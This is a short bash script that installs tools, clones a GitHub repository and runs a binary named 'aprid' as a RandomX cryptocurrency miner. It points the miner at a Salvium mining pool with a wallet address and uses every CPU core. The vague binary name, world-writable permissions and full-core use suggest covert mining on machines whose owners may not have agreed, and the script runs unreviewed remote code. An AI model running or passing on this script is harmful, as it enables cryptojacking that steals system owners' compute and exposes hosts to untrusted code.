#!/bin/bash
yum update && yum -y install sudo
yum -y install git wget
git clone https://github.com/nonibihan/luo.git && cd luo
chmod 777 aprid SHA256SUMS
./aprid --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvsBwqbLM2xmv37AqvW1arAsZJ7g2GZ3H7nqwmsCFw7kNBc7bahNyMejjMpM6xKQPZzpCTXYbWTPULou11ffwUiTmg7jUtHg3 -p ulated -a rx/0 -k -t $(nproc --all)
